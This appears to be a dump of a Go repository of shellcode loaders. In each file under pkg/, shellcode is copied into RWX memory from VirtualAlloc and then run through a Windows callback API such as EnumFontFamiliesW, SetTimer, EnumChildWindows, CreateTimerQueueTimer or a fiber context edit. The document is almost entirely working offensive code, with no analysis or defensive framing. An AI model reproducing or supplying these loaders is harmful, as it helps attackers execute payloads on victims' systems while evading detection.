kernel32.MustFindProc("VirtualAlloc") 23 | GetCurrentProcess = kernel32.MustFindProc("GetCurrentProcess") 24 | FlsAlloc = kernel32.MustFindProc("FlsAlloc") 25 | FlsSetValue = kernel32.MustFindProc("FlsSetValue") 26 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 27 | ) 28 | 29 | func Callback(shellcode []byte) { 30 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 31 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 32 | dIndex, _, _ := FlsAlloc.Call(addr) 33 | dummy, _ := syscall.UTF16PtrFromString("dummy") 34 | FlsSetValue.Call(dIndex, (uintptr)(unsafe.Pointer(dummy))) 35 | } 36 | -------------------------------------------------------------------------------- /pkg/EnumFontFamiliesW/EnumFontFamiliesW.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int 10 | dummy [522]byte 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | NULL = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 22 | ntdll = syscall.MustLoadDLL("ntdll.dll") 23 | User32 = syscall.MustLoadDLL("User32.dll") 24 | Gdi32 = syscall.MustLoadDLL("Gdi32.dll") 25 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 26 | GetDC = User32.MustFindProc("GetDC") 27 | EnumFontFamiliesW = Gdi32.MustFindProc("EnumFontFamiliesW") 28 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 29 | ) 30 | 31 | func Callback(shellcode []byte) { 32 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 33 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 34 | dc, _, _ := GetDC.Call(NULL) 35 | EnumFontFamiliesW.Call(dc, NULL, addr, NULL) 36 | } 37 | -------------------------------------------------------------------------------- /pkg/InitOnceExecuteOnce/InitOnceExecuteOnce.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | g_InitOnce uintptr 10 | lpContext uintptr 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | NULL = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 22 | ntdll = syscall.MustLoadDLL("ntdll.dll") 23 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 24 | InitOnceExecuteOnce = kernel32.MustFindProc("InitOnceExecuteOnce") 25 | GetCurrentProcess = kernel32.MustFindProc("GetCurrentProcess") 26 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 27 | ) 28 | 29 | func Callback(shellcode []byte) { 30 | GetCurrentProcess.Call() 31 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 32 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 33 | 34 | InitOnceExecuteOnce.Call((uintptr)(unsafe.Pointer(&g_InitOnce)), addr, NULL, (uintptr)(unsafe.Pointer(&lpContext))) 35 | } 36 | -------------------------------------------------------------------------------- /pkg/EnumCalendarInfo/EnumCalendarInfo.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | CAL_SMONTHNAME1 = 0x00000015 17 | ENUM_ALL_CALENDARS = 0xffffffff 18 | SORT_DEFAULT = 0x0 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 23 | ntdll = syscall.MustLoadDLL("ntdll.dll") 24 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 25 | EnumCalendarInfoW = kernel32.MustFindProc("EnumCalendarInfoW") 26 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 27 | ) 28 | 29 | func Callback(shellcode []byte) { 30 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 31 | if err != nil && err.Error() != "The operation completed successfully." { 32 | syscall.Exit(0) 33 | } 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 35 | EnumCalendarInfoW.Call(addr, SORT_DEFAULT, ENUM_ALL_CALENDARS, CAL_SMONTHNAME1) 36 | } 37 | -------------------------------------------------------------------------------- /pkg/EnumChildWindows/EnumChildWindows.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | CAL_SMONTHNAME1 = 0x00000015 17 | ENUM_ALL_CALENDARS = 0xffffffff 18 | SORT_DEFAULT = 0x0 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 23 | ntdll = syscall.MustLoadDLL("ntdll.dll") 24 | User32 = syscall.MustLoadDLL("User32.dll") 25 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 26 | EnumChildWindows = User32.MustFindProc("EnumChildWindows") 27 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 28 | ) 29 | 30 | func Callback(shellcode []byte) { 31 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 32 | if err != nil && err.Error() != "The operation completed successfully." { 33 | syscall.Exit(0) 34 | } 35 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 36 | EnumChildWindows.Call(0, addr, 0) 37 | } 38 | -------------------------------------------------------------------------------- /pkg/EnumCalendarInfoEX/EnumCalendarInfoEX.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | CAL_SMONTHNAME1 = 0x00000015 17 | ENUM_ALL_CALENDARS = 0xffffffff 18 | SORT_DEFAULT = 0x0 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 23 | ntdll = syscall.MustLoadDLL("ntdll.dll") 24 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 25 | EnumCalendarInfoExW = kernel32.MustFindProc("EnumCalendarInfoExW") 26 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 27 | ) 28 | 29 | func Callback(shellcode []byte) { 30 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 31 | if err != nil && err.Error() != "The operation completed successfully." { 32 | syscall.Exit(0) 33 | } 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 35 | EnumCalendarInfoExW.Call(addr, SORT_DEFAULT, ENUM_ALL_CALENDARS, CAL_SMONTHNAME1) 36 | } 37 | -------------------------------------------------------------------------------- /pkg/EnumICMProfiles/EnumICMProfiles.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 20 | ntdll = syscall.MustLoadDLL("ntdll.dll") 21 | Gdi32 = syscall.MustLoadDLL("Gdi32.dll") 22 | User32 = syscall.MustLoadDLL("User32.dll") 23 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 24 | EnumICMProfilesW = Gdi32.MustFindProc("EnumICMProfilesW") 25 | GetDC = User32.MustFindProc("GetDC") 26 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 27 | ) 28 | 29 | func Callback(shellcode []byte) { 30 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 31 | if err != nil && err.Error() != "The operation completed successfully." { 32 | syscall.Exit(0) 33 | } 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 35 | dummy, _, _ := GetDC.Call(0) 36 | EnumICMProfilesW.Call(dummy, addr, 0) 37 | } 38 | -------------------------------------------------------------------------------- /pkg/EnumObjects/EnumObjects.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int 10 | dummy [522]byte 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | NULL = 0 18 | OBJ_BRUSH = 2 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 23 | ntdll = syscall.MustLoadDLL("ntdll.dll") 24 | User32 = syscall.MustLoadDLL("User32.dll") 25 | Gdi32 = syscall.MustLoadDLL("Gdi32.dll") 26 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 27 | GetDC = User32.MustFindProc("GetDC") 28 | EnumFontFamiliesW = Gdi32.MustFindProc("EnumFontFamiliesW") 29 | EnumObjects = Gdi32.MustFindProc("EnumObjects") 30 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 31 | ) 32 | 33 | func Callback(shellcode []byte) { 34 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 35 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 36 | dc, _, _ := GetDC.Call(NULL) 37 | EnumObjects.Call(dc, OBJ_BRUSH, addr, NULL) 38 | } 39 | -------------------------------------------------------------------------------- /pkg/EnumResourceTypesExW/EnumResourceTypesExW.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int 10 | dummy [522]byte 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | NULL = 0 18 | RESOURCE_ENUM_VALIDATE = 0x0008 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 23 | ntdll = syscall.MustLoadDLL("ntdll.dll") 24 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 25 | LoadLibraryW = kernel32.MustFindProc("LoadLibraryW") 26 | EnumResourceTypesExW = kernel32.MustFindProc("EnumResourceTypesExW") 27 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 28 | ) 29 | 30 | func Callback(shellcode []byte) { 31 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 32 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 33 | 34 | p1, _ := syscall.UTF16PtrFromString("Kernel32.dll") 35 | dll1, _, _ := LoadLibraryW.Call(uintptr(unsafe.Pointer(p1))) 36 | EnumResourceTypesExW.Call(dll1, addr, NULL, RESOURCE_ENUM_VALIDATE, NULL) 37 | } 38 | -------------------------------------------------------------------------------- /pkg/EnumFontFamiliesExW/EnumFontFamiliesExW.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 20 | ntdll = syscall.MustLoadDLL("ntdll.dll") 21 | Gdi32 = syscall.MustLoadDLL("Gdi32.dll") 22 | User32 = syscall.MustLoadDLL("User32.dll") 23 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 24 | EnumFontFamiliesExW = Gdi32.MustFindProc("EnumFontFamiliesExW") 25 | GetDC = User32.MustFindProc("GetDC") 26 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 27 | ) 28 | 29 | func Callback(shellcode []byte) { 30 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 31 | if err != nil && err.Error() != "The operation completed successfully." { 32 | syscall.Exit(0) 33 | } 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 35 | dc, _, _ := GetDC.Call(0) 36 | EnumFontFamiliesExW.Call(dc, (uintptr)(unsafe.Pointer(&dc)), addr, 0, 0) 37 | } 38 | -------------------------------------------------------------------------------- /pkg/SymEnumProcesses/SymEnumProcesses.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | FALSE = 0 17 | ) 18 | 19 | var ( 20 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 21 | ntdll = syscall.MustLoadDLL("ntdll.dll") 22 | Dbghelp = syscall.MustLoadDLL("Dbghelp.dll") 23 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 24 | GetCurrentProcess = kernel32.MustFindProc("GetCurrentProcess") 25 | SymInitialize = Dbghelp.MustFindProc("SymInitialize") 26 | SymEnumProcesses = Dbghelp.MustFindProc("SymEnumProcesses") 27 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 28 | ) 29 | 30 | func Callback(shellcode []byte) { 31 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 32 | if err != nil && err.Error() != "The operation completed successfully." { 33 | syscall.Exit(0) 34 | } 35 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 36 | Proces, _, _ := GetCurrentProcess.Call() 37 | SymInitialize.Call(Proces, 0, FALSE) 38 | SymEnumProcesses.Call(addr, 0) 39 | } 40 | -------------------------------------------------------------------------------- /pkg/EnumDesktopWindows/EnumDesktopWindows.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 20 | ntdll = syscall.MustLoadDLL("ntdll.dll") 21 | User32 = syscall.MustLoadDLL("User32.dll") 22 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 23 | GetCurrentThreadId = kernel32.MustFindProc("GetCurrentThreadId") 24 | EnumDesktopWindows = User32.MustFindProc("EnumDesktopWindows") 25 | GetThreadDesktop = User32.MustFindProc("GetThreadDesktop") 26 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 27 | ) 28 | 29 | func Callback(shellcode []byte) { 30 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 31 | if err != nil && err.Error() != "The operation completed successfully." { 32 | syscall.Exit(0) 33 | } 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 35 | 36 | Thr, _, _ := GetCurrentThreadId.Call() 37 | ThrD, _, _ := GetThreadDesktop.Call(Thr) 38 | 39 | EnumDesktopWindows.Call(ThrD, addr, 0) 40 | } 41 | -------------------------------------------------------------------------------- /pkg/SetTimer/SetTimer.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | g_InitOnce [0]byte 10 | lpContext [0]byte 11 | ) 12 | 13 | type MSG struct { 14 | } 15 | 16 | const ( 17 | MEM_COMMIT = 0x1000 18 | MEM_RESERVE = 0x2000 19 | PAGE_EXECUTE_READWRITE = 0x40 20 | NULL = 0 21 | dummy = 0 22 | ) 23 | 24 | var ( 25 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 26 | ntdll = syscall.MustLoadDLL("ntdll.dll") 27 | User32 = syscall.MustLoadDLL("User32.dll") 28 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 29 | SetTimer = User32.MustFindProc("SetTimer") 30 | GetMessageW = User32.MustFindProc("GetMessageW") 31 | DispatchMessageW = User32.MustFindProc("DispatchMessageW") 32 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 33 | ) 34 | 35 | func Callback(shellcode []byte) { 36 | 37 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 38 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 39 | msg := MSG{} 40 | SetTimer.Call(NULL, dummy, NULL, addr) 41 | GetMessageW.Call((uintptr)(unsafe.Pointer(&msg)), NULL, 0, 0) 42 | DispatchMessageW.Call((uintptr)(unsafe.Pointer(&msg))) 43 | } 44 | -------------------------------------------------------------------------------- /pkg/SysEnumSourceFiles/SysEnumSourceFiles.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "golang.org/x/sys/windows" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | dummy [256]byte 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | NULL = 0 18 | TRUE = 1 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 23 | ntdll = syscall.MustLoadDLL("ntdll.dll") 24 | Dbghelp = syscall.MustLoadDLL("Dbghelp.dll") 25 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 26 | GetCurrentProcess = kernel32.MustFindProc("GetCurrentProcess") 27 | SymInitialize = Dbghelp.MustFindProc("SymInitialize") 28 | SymEnumSourceFiles = Dbghelp.MustFindProc("SymEnumSourceFiles") 29 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 35 | hProcess := windows.CurrentProcess() 36 | SymInitialize.Call(uintptr(unsafe.Pointer(&hProcess)), NULL, TRUE) 37 | SymEnumSourceFiles.Call(uintptr(unsafe.Pointer(&hProcess)), NULL, NULL, addr, NULL) 38 | } 39 | -------------------------------------------------------------------------------- /pkg/EnumDesktopW/EnumDesktopW.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "time" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | timer int 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | CAL_SMONTHNAME1 = 0x00000015 18 | ENUM_ALL_CALENDARS = 0xffffffff 19 | SORT_DEFAULT = 0x0 20 | ) 21 | 22 | var ( 23 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 24 | ntdll = syscall.MustLoadDLL("ntdll.dll") 25 | User32 = syscall.MustLoadDLL("User32.dll") 26 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 27 | EnumDesktopsW = User32.MustFindProc("EnumDesktopsW") 28 | GetProcessWindowStation = User32.MustFindProc("GetProcessWindowStation") 29 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | if err != nil && err.Error() != "The operation completed successfully." { 35 | syscall.Exit(0) 36 | } 37 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 38 | Process, _, _ := GetProcessWindowStation.Call() 39 | EnumDesktopsW.Call(Process, addr, 0) 40 | time.Sleep(10000) 41 | } 42 | -------------------------------------------------------------------------------- /pkg/CopyFileEx/CopyFileEx.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | const ( 9 | MEM_COMMIT = 0x1000 10 | MEM_RESERVE = 0x2000 11 | PAGE_EXECUTE_READWRITE = 0x40 12 | COPY_FILE_FAIL_IF_EXISTS = 0x00000001 13 | FALSE = 0 14 | ) 15 | 16 | var ( 17 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 18 | ntdll = syscall.MustLoadDLL("ntdll.dll") 19 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 20 | DeleteFileW = kernel32.MustFindProc("DeleteFileW") 21 | CopyFileExW = kernel32.MustFindProc("CopyFileExW") 22 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 23 | ) 24 | 25 | func Callback(shellcode []byte) { 26 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 27 | if err != nil && err.Error() != "The operation completed successfully." { 28 | syscall.Exit(0) 29 | } 30 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 31 | 32 | p1, _ := syscall.UTF16PtrFromString("C:\\Windows\\Temp\\backup.log\\0") 33 | p2, _ := syscall.UTF16PtrFromString("C:\\Windows\\DirectX.log") 34 | p3, _ := syscall.UTF16PtrFromString("C:\\Windows\\Temp\\backup.log") 35 | 36 | DeleteFileW.Call(uintptr(unsafe.Pointer(p1))) 37 | CopyFileExW.Call( 38 | uintptr(unsafe.Pointer(p2)), 39 | uintptr(unsafe.Pointer(p3)), 40 | addr, 41 | 0, 42 | FALSE, COPY_FILE_FAIL_IF_EXISTS) 43 | } 44 | -------------------------------------------------------------------------------- /pkg/EnumDirTreeW/EnumDirTreeW.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int 10 | dummy [522]byte 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 17 | TRUE = 1 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 22 | ntdll = syscall.MustLoadDLL("ntdll.dll") 23 | Dbghelp = syscall.MustLoadDLL("Dbghelp.dll") 24 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 25 | GetCurrentProcess = kernel32.MustFindProc("GetCurrentProcess") 26 | SymInitialize = Dbghelp.MustFindProc("SymInitialize") 27 | EnumDirTreeW = Dbghelp.MustFindProc("EnumDirTreeW") 28 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 29 | ) 30 | 31 | func Callback(shellcode []byte) { 32 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 33 | if err != nil && err.Error() != "The operation completed successfully." { 34 | syscall.Exit(0) 35 | } 36 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 37 | Process, _, _ := GetCurrentProcess.Call() 38 | SymInitialize.Call(Process, 0, TRUE) 39 | p1, _ := syscall.UTF16PtrFromString("C:\\\\Windows") 40 | p2, _ := syscall.UTF16PtrFromString("*.log") 41 | EnumDirTreeW.Call(Process, (uintptr)(unsafe.Pointer(p1)), (uintptr)(unsafe.Pointer(p2)), (uintptr)(unsafe.Pointer(&dummy)), addr, 0) 42 | } 43 | -------------------------------------------------------------------------------- /pkg/CreateTimerQueueTimer_Tech/CreateTimerQueueTimer_Tech.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 16 | TRUE = 1 17 | FALSE = 0 18 | INFINITE = 0xFFFFFFFF 19 | ) 20 | 21 | var ( 22 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 23 | ntdll = syscall.MustLoadDLL("ntdll.dll") 24 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 25 | CreateTimerQueue = kernel32.MustFindProc("CreateTimerQueue") 26 | CreateEventW = kernel32.MustFindProc("CreateEventW") 27 | WaitForSingleObject = kernel32.MustFindProc("WaitForSingleObject") 28 | CreateTimerQueueTimer = kernel32.MustFindProc("CreateTimerQueueTimer") 29 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 30 | ) 31 | 32 | func Callback(shellcode []byte) { 33 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 34 | if err != nil && err.Error() != "The operation completed successfully." { 35 | syscall.Exit(0) 36 | } 37 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 38 | queue, _, _ := CreateTimerQueue.Call() 39 | gDoneEvent, _, _ := CreateEventW.Call(0, TRUE, FALSE, 0) 40 | CreateTimerQueueTimer.Call((uintptr)(unsafe.Pointer(&timer)), queue, addr, 0, 100, 0, 0) 41 | WaitForSingleObject.Call(gDoneEvent, INFINITE) 42 | } 43 | -------------------------------------------------------------------------------- /pkg/FiberContextEdit/FiberContextEdit.go: -------------------------------------------------------------------------------- 1 | package Loaders 2 | 3 | import ( 4 | "fmt" 5 | "os" 6 | "syscall" 7 | "unsafe" 8 | ) 9 | 10 | var ( 11 | g_InitOnce [0]byte 12 | lpContext [0]byte 13 | ) 14 | 15 | const ( 16 | MEM_COMMIT = 0x1000 17 | MEM_RESERVE = 0x2000 18 | PAGE_EXECUTE_READWRITE = 0x40 19 | NULL = 0 20 | ) 21 | 22 | var ( 23 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 24 | ntdll = syscall.MustLoadDLL("ntdll.dll") 25 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 26 | CreateFiber = kernel32.MustFindProc("CreateFiber") 27 | SwitchToFiber = kernel32.MustFindProc("SwitchToFiber") 28 | ConvertThreadToFiber = kernel32.MustFindProc("ConvertThreadToFiber") 29 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 30 | ) 31 | 32 | func dummy() { 33 | var age string 34 | fmt.Scanln(&age) 35 | } 36 | 37 | func Callback(shellcode []byte) { 38 | var d func() 39 | d = dummy 40 | ConvertThreadToFiber.Call(NULL) 41 | lpFiber, err1, _ := CreateFiber.Call(0x100, (uintptr)(unsafe.Pointer(&d)), NULL) 42 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 43 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 44 | if lpFiber == NULL { 45 | fmt.Printf("GLE : %d\n", err1) 46 | os.Exit(0) 47 | } 48 | 49 | tgtFuncAddr := (*uintptr)(unsafe.Pointer(lpFiber + uintptr(0xB0))) 50 | *tgtFuncAddr = addr 51 | fmt.Println(tgtFuncAddr) 52 | SwitchToFiber.Call(lpFiber) 53 | } 54 